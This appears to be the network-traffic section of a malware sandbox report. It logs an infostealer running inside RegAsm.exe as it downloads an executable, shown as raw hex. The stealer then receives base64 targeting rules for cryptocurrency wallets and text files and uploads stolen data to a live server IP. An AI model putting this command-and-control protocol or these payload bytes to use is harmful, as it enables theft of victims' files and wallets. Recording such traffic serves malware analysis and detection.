2024-04-24 14:49:36 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-24 14:49:36 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-24 14:49:36 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-04-24 14:49:36 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-24 14:49:36 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49761	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:37 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:37 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------GHDAAKJEGCFCAKEBKJJECont
2024-04-24 14:49:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:38 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49762	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:39 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHD User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:39 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------JDGCGDBGCAAEBFIECGHDCont
2024-04-24 14:49:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:40 UTC	131	IN	Data Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49763	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:42 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:42 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KFIDAFBFBKFHJJKEHIEGCont
2024-04-24 14:49:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49764	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:44 UTC	266	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 130205 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------DBKFHJEBAAEBGDGDBFBGCont
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 31 36 78 62 4f 6d 50 66 6b 39 61 38 78 72 32 33 51 62 4c 56 4a 50 67 68 4e 62 78 71 72 33 6c 78 46 4b 4c 53 4d 38 4f 59 53 32 57 55 64 79 53 41 35 41 2b 6c 65 4a 56 76 57 69 6b 6f 74 4c 6f 65 5a 6c 39 53 55 35 56 56 4b 56 37 53 73 46 64 4a 34 61 2f 77 42 52 4d 50 38 41 61 2f 6f 4b 35 75 75 6a 38 4e 66 36 6d 62 2f 65 2f 77 41 4b 39 54 68 2f 2f 66 6c 36 4d 38 50 6a 6a 2f 6b 55 53 39 59 2f 6d 62 75 4b 57 69 69 76 30 41 2f 45 78 4b 4b 4d 55 59 6f 47 65 30 7a 51 70 4d 75 47 34 50 5a 68 31 46 5a 32 43 6b 6a 49 54 6e 61 53 4b 31 43 61 79 6e 50 2b 6b 79 2f 37 35 2f 6e 58 34 7a 57 53 33 50 32 43 42 59 51 31 35 5a 71 2f 2f 49 61 76 2f 77 44 72 34 6b 2f 39 43 4e 65 6f 78 6d 76 4c 74 58 2f 35 44 56 39 2f 31 38 53 66 2b 68 47 76 71 65 44 2f 41 4f 4e 55 39 46 2b 5a 38 Data Ascii: 16xbOmPfk9a8xr23QbLVJPghNbxqr3lxFKLSM8OYS2WUdySA5A+leJVvWikotLoeZl9SU5VVKV7SsFdJ4a/wBRMP8Aa/oK5uuj8Nf6mb/e/wAK9Th//fl6M8Pjj/kUS9Y/mbuKWiiv0A/ExKKMUYoGe0zQpMuG4PZh1FZ2CkjITnaSK1CaynP+ky/75/nX4zWS3P2CBYQ15Zq//Iav/wDr4k/9CNeoxmvLtX/5DV9/18Sf+hGvqeD/AONU9F+Z8
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 30 2b 4b 46 72 34 71 75 47 75 56 55 5a 49 39 54 7a 7a 39 65 4f 39 65 58 36 54 70 6d 75 50 71 63 55 65 6c 43 56 4c 78 74 77 6a 61 47 63 52 74 30 4a 50 7a 5a 47 4f 41 61 32 34 50 42 66 6a 71 31 75 35 4c 75 33 74 37 6d 47 35 6b 7a 76 6d 6a 76 6b 56 32 79 63 6e 4a 44 35 4f 54 7a 58 35 2f 4b 6e 4f 6d 2b 57 63 57 6d 66 58 59 57 62 64 4e 38 6b 57 30 2b 71 2f 72 63 71 2f 44 6e 2f 6b 66 64 4d 2f 37 61 2f 38 41 6f 70 36 37 47 79 38 58 51 47 33 76 70 58 38 66 2f 61 45 68 67 44 6c 76 37 47 4b 65 54 6d 52 46 33 59 32 2f 4e 39 37 62 6a 2f 61 7a 32 72 50 38 46 65 43 76 45 4f 6c 2b 4c 72 50 55 4e 51 73 66 4b 67 69 38 77 75 35 6d 52 6a 6b 6f 77 48 41 59 6e 71 61 39 62 6f 67 6e 59 37 38 48 52 6c 37 4b 30 72 72 56 39 31 30 58 6d 6a 67 4c 6e 56 34 64 5a 2b 48 65 70 33 45 47 Data Ascii: 0+KFr4quGuVUZI9Tzz9eO9eX6TpmuPqcUelCVLxtwjaGcRt0JPzZGOAa24PBfjq1u5Lu3t7mG5kzvmjvkV2ycnJD5OTzX5/KnOm+WcWmfXYWbdN8kW0+q/rcq/Dn/kfdM/7a/8Aop67Gy8XQG3vpX8f/aEhgDlv7GKeTmRF3Y2/N97bj/az2rP8FeCvEOl+LrPUNQsfKgi8wu5mRjkowHAYnqa9bognY78HRl7K0rrV910XmjgLnV4dZ+Hep3EG
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 68 6d 6b 4f 63 66 78 44 30 46 59 65 31 7a 42 79 62 73 39 66 77 32 2f 46 61 6e 53 36 47 56 63 69 6a 7a 4c 53 32 76 66 65 39 2f 58 2f 41 43 4e 74 4c 6c 42 34 65 69 31 4b 57 30 31 46 59 58 74 37 71 5a 39 51 34 2b 7a 51 74 45 38 69 49 6a 66 4a 79 57 4b 4b 4d 62 67 63 73 4d 44 74 54 46 31 4b 78 6d 6c 68 30 2b 4a 4c 78 62 2b 58 54 45 76 6f 35 57 64 47 69 64 7a 43 4a 53 6d 33 59 43 6f 49 79 41 64 78 35 78 78 57 52 62 43 34 69 73 37 52 76 37 4a 6e 47 70 57 64 76 63 32 38 4d 78 75 76 33 4a 57 5a 70 47 4a 61 50 5a 6b 6b 43 51 6a 37 34 48 41 4a 48 61 6e 76 48 4d 31 71 68 67 30 79 61 48 55 6c 30 39 4c 44 37 52 4a 63 68 34 31 56 59 68 45 58 56 4e 67 49 59 71 44 31 5a 67 4d 6e 6a 4f 43 4d 34 79 7a 43 33 58 2b 72 2f 77 44 41 4e 70 77 79 6d 2b 6e 4c 62 39 4e 50 2b 43 62 Data Ascii: hmkOcfxD0FYe1zBybs9fw2/FanS6GVcijzLS2vfe9/X/ACNtLlB4ei1KW01FYXt7qZ9Q4+zQtE8iIjfJyWKKMbgcsMDtTF1Kxmlh0+JLxb+XTEvo5WdGidzCJSm3YCoIyAdx5xxWRbC4is7Rv7JnGpWdvc28Mxuv3JWZpGJaPZkkCQj74HAJHanvHM1qhg0yaHUl09LD7RJch41VYhEXVNgIYqD1ZgMnjOCM4yzC3X+r/wDANpwym+nLb9NP+Cb
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 6a 37 66 42 36 76 2b 56 46 6d 42 61 34 6f 7a 56 54 37 66 42 2f 74 2f 6c 52 2f 61 4d 47 65 72 2f 6c 54 73 78 32 4c 64 47 61 71 66 32 6a 62 2b 72 2f 41 4a 55 66 32 6a 42 2f 74 2f 6c 52 5a 68 59 74 53 6a 4e 6e 64 66 38 41 58 4c 2b 6f 72 50 30 30 34 6e 62 2f 41 48 61 66 4a 71 4d 52 74 35 55 54 64 6c 31 32 38 6a 33 42 71 74 5a 33 43 57 38 72 4d 2b 63 46 63 63 55 52 69 30 6d 4b 78 72 30 56 56 2f 74 43 33 78 31 66 38 71 54 2b 30 62 66 2b 38 33 35 55 57 59 37 46 76 4e 4c 6d 71 66 38 41 61 46 74 6e 37 7a 2f 6c 53 2f 32 6a 62 66 33 6d 2f 77 43 2b 61 4c 4d 4c 46 71 67 39 4b 71 66 32 6a 61 2f 33 6d 2f 37 35 6f 2f 74 4b 32 2f 76 4e 2f 77 42 38 30 57 59 37 46 75 69 71 6e 39 6f 32 33 39 35 2f 2b 2b 61 50 37 52 74 76 37 7a 2f 39 38 30 57 59 57 5a 62 7a 36 55 74 55 78 71 Data Ascii: j7fB6v+VFmBa4ozVT7fB/t/lR/aMGer/lTsx2LdGaqf2jb+r/AJUf2jB/t/lRZhYtSjNndf8AXL+orP004nb/AHafJqMRt5UTdl128j3BqtZ3CW8rM+cFccURi0mKxr0VV/tC3x1f8qT+0bf+835UWY7FvNLmqf8AaFtn7z/lS/2jbf3m/wC+aLMLFqg9Kqf2ja/3m/75o/tK2/vN/wB80WY7Fuiqn9o2395/++aP7Rtv7z/980WYWZbz6UtUxq
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 4a 66 6e 48 66 41 5a 56 79 42 31 47 61 57 53 37 75 39 4f 74 49 5a 72 71 79 6a 4e 37 61 61 62 4e 4d 39 75 36 67 69 53 55 58 68 68 44 4e 2f 65 56 56 4f 37 75 43 41 4f 31 58 55 7a 53 6c 54 6b 34 74 66 31 61 35 6c 53 79 47 76 56 67 70 71 53 73 2f 38 37 47 74 52 57 62 70 75 70 54 58 56 31 70 55 39 32 6c 6a 46 4b 37 33 30 55 6a 65 51 6f 68 63 52 32 33 6d 4b 35 6a 56 64 76 79 6b 38 34 58 6e 6a 67 6d 6d 51 61 6d 62 69 58 54 70 48 6c 74 4a 55 6e 73 79 78 75 37 52 42 46 44 63 4d 4a 47 42 4b 70 74 55 72 74 34 55 35 56 53 53 4d 34 78 67 6d 71 65 5a 51 6c 56 56 4b 31 6e 2f 77 2f 77 44 6b 52 57 79 57 70 54 77 37 78 48 4e 64 62 2f 6f 61 74 46 4d 57 57 4e 7a 68 5a 45 59 2b 7a 43 69 53 52 6f 56 45 69 42 43 36 6e 4b 68 30 44 67 6e 30 32 6b 45 48 36 59 72 30 47 39 4c 6f 38 Data Ascii: JfnHfAZVyB1GaWS7u9OtIZrqyjN7aabNM9u6giSUXhhDN/eVVO7uCAO1XUzSlTk4tf1a5lSyGvVgpqSs/87GtRWbpupTXV1pU92ljFK730UjeQohcR23mK5jVdvyk84XnjgmmQambiXTpHltJUnsyxu7RBFDcMJGBKptUrt4U5VSSM4xgmqeZQlVVK1n/w/wDkRWyWpTw7xHNdb/oatFMWWNzhZEY+zCiSRoVEiBC6nKh0Dgn02kEH6Yr0G9Lo8
2024-04-24 14:49:44 UTC	16355	OUT	Data Raw: 36 39 55 76 7a 5a 7a 56 46 64 51 50 42 2b 66 2b 58 2f 2f 41 4d 67 2f 2f 5a 56 42 71 58 68 6a 2b 7a 39 4f 6c 75 2f 74 6e 6d 65 58 6a 35 66 4b 78 6e 4a 41 36 35 39 36 79 70 5a 37 6c 39 57 61 70 77 71 58 62 64 6c 70 4c 64 2f 49 31 71 35 44 6d 46 4b 44 71 54 70 32 53 56 33 72 48 5a 66 4d 35 36 69 69 69 76 58 50 49 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 39 46 73 2f 42 47 6b 33 46 6a 62 7a 75 62 6b 4e 4a 45 72 6b 4c 49 4d 5a 49 42 39 4b 6d 2f 34 51 4c 52 2f 77 43 2f 64 66 38 41 66 77 66 34 56 35 50 39 73 55 4f 7a 2f 44 2f 4d 2b 67 2f 31 62 78 58 38 30 66 76 66 2b 52 35 70 52 58 6f 6c 35 34 49 30 71 43 79 75 4a 6b 65 36 33 52 78 4d 34 42 6b 47 4d 67 5a 39 4b 35 54 58 39 42 6c 30 65 35 79 75 58 74 58 50 79 50 36 65 78 39 36 32 6f 5a 6c 52 72 54 35 46 64 50 7a 4f Data Ascii: 69UvzZzVFdQPB+f+X//AMg//ZVBqXhj+z9Olu/tnmeXj5fKxnJA6596ypZ7l9WapwqXbdlpLd/I1q5DmFKDqTp2SV3rHZfM56iiivXPICiiigAooooAKK9Fs/BGk3FjbzubkNJErkLIMZIB9Km/4QLR/wC/df8Afwf4V5P9sUOz/D/M+g/1bxX80fvf+R5pRXol54I0qCyuJke63RxM4BkGMgZ9K5TX9Bl0e5yuXtXPyP6ex962oZlRrT5FdPzO
